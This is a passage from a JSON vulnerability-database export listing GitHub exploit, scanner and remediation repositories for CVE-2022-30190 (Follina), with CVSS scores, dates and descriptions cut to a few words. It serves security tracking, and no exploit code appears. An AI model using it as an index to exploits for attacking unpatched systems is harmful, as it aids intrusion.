"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:40:13", "id": "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T18:30:23", "description": "# CVE-2022-30190\n\n[![N|Solid](https://socprime.com/wp-content/up...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-04T19:48:37", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:25", "id": "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-10-01T20:48:17", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-02T12:17:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-29T08:17:18", "id": "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:40:16", "description": "# CVE-2022-30190\n\n## Usag...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:13:16", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-06T16:59:02", "id": "74AB19DC-78DE-56B8-8EB3-DBFA48B17AD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:38:34", "description": "# Follina-Remediation\nRemoves the ability for MSDT t...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:26:56", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T20:26:21", "id": "5DC52EE8-31C1-5E05-8AC1-8385C2002254", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:38:15", "description": "# FollinaScanner\nA tool written in Go that scans files & directo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T06:45:19", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-09T21:35:20", "id": "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:30:36", "description": "# **_\ud83e\ude79CVE-2022-30190 Temporary Fix\ud83e\ude79_**\nThese are two Python scri...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-11T11:16:56", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T10:21:00", "id": "39D1AD81-7117-5EA3-8421-A33979B77F49", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:38:12", "description": "# CVE-2022-30190\n\nCVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHos...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T07:01:19", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:24", "id": "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:40:22", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHost exploit.html ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T06:45:25", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-11-24T20:25:39", "id": "1840A140-1CD9-55F2-A8BD-9B7B27779956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:38:33", "description": "**NOTE**: This tool is now **obsolete**! [The Follina exploit is...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T02:47:34", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-01-27T23:35:56", "id": "30F42F9A-5E27-592E-BE65-B85DC7E22075", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T18:33:42", "description": "Microsoft explains that \u201ca remote code execution vulnerability e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T15:24:54", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-18T20:13:19", "id": "81008F39-5622-5A06-95F5-737A63D240D0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:34:25", "description": "# Follina MS-MSDT exploitation with Spring Boot\n\nThis repository...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T22:46:23", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-17T23:25:27", "id": "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:11:25", "description": "# 'Follina' MS-MSDT n-day Microsoft Office RCE\u2014\u4fee\u6539\u7248\n\n\u6839\u636e https://g...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T12:33:18", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-12-06T02:10:38", "id": "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:34:47", "description": "# go_follina\n\nFollina ([CVE-2022-30190](ht...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-27T16:14:34", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:32", "id": "45B4D881-57D9-51C8-B5B9-9A6DA7413A36", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T23:09:18", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T18:17:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-18T07:34:31", "id": "E34732DA-6DCA-54FF-8A7A-C1CCE3D1B1DE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:50", "description": "# CVE-2022-30190\nCVE-2022-30190 Follina POC\n\n\nHost exploit.html...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T18:58:55", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-27T23:24:23", "id": "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:03:20", "description": "# CVE-2022-30190_EXP_PowerPoint\n\nThis is exploit of CVE-2022-301...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:40:13", "id": "8AB79327-A57A-5D2D-830F-F7DAA97B76AA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T18:55:17", "description": "# CVE 30190\n\n> Amine TITROFINE | December 17, 2022\n\n------------...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-14T13:38:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-10-26T20:33:52", "id": "B49D93D1-E77A-5CAA-8DAC-BC353782D5A7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:17:26", "description": "# Five Nights at Follina's\nA Fullstack Academy Cybersecurity pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-01T16:47:50", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T16:10:38", "id": "A78746B7-318B-5981-A2EB-2D5BA5C26514", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:51:43", "description": "CVE-2022-30190\r\n\r\n# IMPORTANT\r\n\r\n## Patched as of:\r\nJu...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:14:13", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 